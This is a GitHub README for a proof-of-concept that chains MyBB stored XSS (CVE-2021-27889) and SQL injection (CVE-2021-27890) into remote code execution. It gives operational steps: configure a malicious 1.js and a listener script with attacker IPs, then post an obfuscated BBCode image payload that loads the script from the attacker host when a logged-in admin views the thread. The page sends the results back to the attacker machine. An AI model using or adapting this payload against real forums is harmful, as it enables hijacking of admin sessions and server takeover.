Skip to content

Mybb associate CVE-2021-27890 & CVE-2021-27889 to RCE poc

Notifications You must be signed in to change notification settings

xiaopan233/Mybb-XSS_SQL_RCE-POC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Mybb-XSS_SQL_RCE-POC

Mybb associate CVE-2021-27890 & CVE-2021-27889 to RCE poc

Before Use:

There are two files here: 1.js and attack_listen.py

You should modify these two file:

1.js:

modify the mybb forum url and attack url:

var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py

attack_listen.py

modify the attack host and attack port:

attack_host = '192.168.92.165'
attack_port = 8080

Usage:

CVE-2021-27889 is xss. You should inject the following payload in "New Post Thread" or "Reply" or "Private Messages" before do the attack.In this demo,I send the payload to "New Post Thread"

notice that the 192.168.92.165 is the evil server ip,You should change it.

[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]


Now Our evil js 1.js is injected successful.Then we should wait an Admin browsed this Post with loggined admin page cookie.

Notice that the Admin user have no necessary loggin the forum page.


In our waiting time,We should run the "attack_listen.py" in our attack machine, To identify if the Admin user be attacked.

python3 attack_listen.py

When the Admin user browsed the evil post,the evil js will do the attack:


We can receive the information at our attack machine:

About

Mybb associate CVE-2021-27890 & CVE-2021-27889 to RCE poc

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published